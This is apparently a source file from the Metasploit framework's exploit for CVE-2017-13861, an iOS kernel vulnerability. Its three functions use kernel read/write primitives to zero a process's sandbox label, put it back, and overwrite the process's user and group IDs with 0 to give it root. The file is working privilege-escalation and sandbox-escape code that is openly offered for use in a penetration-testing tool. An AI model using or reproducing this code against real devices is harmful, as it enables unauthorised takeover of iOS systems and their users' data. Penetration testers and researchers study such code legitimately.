GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/sandbox.m
#include "kernel_utils.h"
#include "offsetof.h"
#import <Foundation/Foundation.h>
#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
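uint64_t unsandbox(pid_t pid) {
    // Strip the sandbox MAC label from `pid` so the process is no longer
    // subject to sandbox policy checks.
    //
    // Walks proc -> p_ucred -> cr_label and zeroes the sandbox slot of the
    // MAC label. Returns the previous slot value on success (keep it: it is
    // the `sb` argument sandbox() needs to put the process back), or
    // (uint64_t)-1 if the lookup failed or the write could not be verified.
    // (uint64_t)-1 is UINT64_MAX, so callers must compare against -1 rather
    // than test for a "negative" result.
    //
    // NOTE(review): the ucred and its label are reference-counted kernel
    // objects that may be shared with other processes holding identical
    // credentials; patching them in place affects every holder, not just
    // `pid` — confirm the target's cred is unique before relying on this.
    if (!pid) return -1;

    LOG("[*] Unsandboxing pid %d\n", pid);

    uint64_t proc = proc_of_pid(pid); // pid's process structure in the kernel
    // A failed lookup (assumed to be reported as 0 — TODO confirm against
    // proc_of_pid) would otherwise turn into kernel reads at tiny absolute
    // addresses (0 + off_*), which the read primitive cannot survive.
    if (!proc) return -1;

    uint64_t ucred = KernelRead_64bits(proc + off_p_ucred); // pid's credentials
    if (!ucred) return -1;

    uint64_t cr_label = KernelRead_64bits(ucred + off_ucred_cr_label); // MAC label
    if (!cr_label) return -1;

    uint64_t orig_sb = KernelRead_64bits(cr_label + off_sandbox_slot);

    // Nulling the slot removes the sandbox. The slot index comes from
    // offsetof.h; the original comment believed the first label slot is
    // AMFI's and this is the second — not verified here.
    KernelWrite_64bits(cr_label + off_sandbox_slot, 0);

    // Re-read the whole chain through ucred rather than trusting the cached
    // cr_label, so the verification reflects what a fresh lookup sees.
    uint64_t now = KernelRead_64bits(KernelRead_64bits(ucred + off_ucred_cr_label) + off_sandbox_slot);
    return (now == 0) ? orig_sb : -1;
}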
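int sandbox(pid_t pid, uint64_t sb) {
    // Install `sb` as the sandbox MAC label slot of `pid`. This is the
    // counterpart of unsandbox(), whose return value is the `sb` to pass
    // here to restore the original sandbox.
    //
    // Returns 0 when the slot reads back as `sb` after the write, -1 on a
    // failed lookup or if the write could not be verified.
    //
    // NOTE(review): as with unsandbox(), this writes through a possibly
    // shared, reference-counted ucred/label; every process sharing the cred
    // is affected — confirm the target's cred is unique before relying on it.
    if (!pid) return -1;

    LOG("[*] Sandboxing pid %d with slot at 0x%llx\n", pid, sb);

    uint64_t proc = proc_of_pid(pid); // pid's process structure in the kernel
    // Bail on a failed lookup instead of reading 0 + off_p_ucred through the
    // kernel read primitive (assumes proc_of_pid reports failure as 0 — TODO confirm).
    if (!proc) return -1;

    uint64_t ucred = KernelRead_64bits(proc + off_p_ucred); // pid's credentials
    if (!ucred) return -1;

    uint64_t cr_label = KernelRead_64bits(ucred + off_ucred_cr_label); // MAC label
    if (!cr_label) return -1;

    // Slot index from offsetof.h (believed to be the slot after AMFI's — unverified here).
    KernelWrite_64bits(cr_label + off_sandbox_slot, sb);

    // Verify via a fresh walk from ucred, not the cached cr_label.
    uint64_t now = KernelRead_64bits(KernelRead_64bits(ucred + off_ucred_cr_label) + off_sandbox_slot);
    return (now == sb) ? 0 : -1;
}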
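int rootify(pid_t pid) {
    // Give `pid` uid/gid 0 by patching its proc and ucred directly, without
    // going through setuid(). Zeroes the cached ids on the proc, the
    // effective/real/saved uid and the real/saved gid on the ucred, and
    // collapses the supplementary group list to a single entry of 0.
    //
    // Returns 0 when the patched uid reads back as 0 on both the proc and
    // the ucred, -1 on a failed lookup or if a write could not be verified.
    //
    // NOTE(review): ucreds are reference-counted and may be shared between
    // processes with identical credentials; patching one in place elevates
    // every holder, not just `pid` — confirm the target's cred is unique
    // (e.g. a freshly spawned process) before using this.
    if (!pid) return -1;

    uint64_t proc = proc_of_pid(pid);
    // Avoid turning a failed lookup into kernel reads/writes at 0 + off_*
    // (assumes proc_of_pid reports failure as 0 — TODO confirm).
    if (!proc) return -1;

    uint64_t ucred = KernelRead_64bits(proc + off_p_ucred);
    if (!ucred) return -1;

    // Ids cached on the proc structure.
    KernelWrite_32bits(proc + off_p_uid, 0);
    KernelWrite_32bits(proc + off_p_ruid, 0);
    KernelWrite_32bits(proc + off_p_gid, 0);
    KernelWrite_32bits(proc + off_p_rgid, 0);

    // Ids on the credential itself.
    KernelWrite_32bits(ucred + off_ucred_cr_uid, 0);
    KernelWrite_32bits(ucred + off_ucred_cr_ruid, 0);
    KernelWrite_32bits(ucred + off_ucred_cr_svuid, 0);
    KernelWrite_32bits(ucred + off_ucred_cr_ngroups, 1);
    KernelWrite_32bits(ucred + off_ucred_cr_groups, 0); // groups[0] = 0
    KernelWrite_32bits(ucred + off_ucred_cr_rgid, 0);
    KernelWrite_32bits(ucred + off_ucred_cr_svgid, 0);

    // Verify the write landed on the ucred as well as the proc copy: the
    // original only checked p_uid, which is presumably just a cached copy
    // of cr_uid (the field kernel permission checks are believed to use).
    if (KernelRead_32bits(proc + off_p_uid) != 0) return -1;
    if (KernelRead_32bits(ucred + off_ucred_cr_uid) != 0) return -1;
    return 0;
}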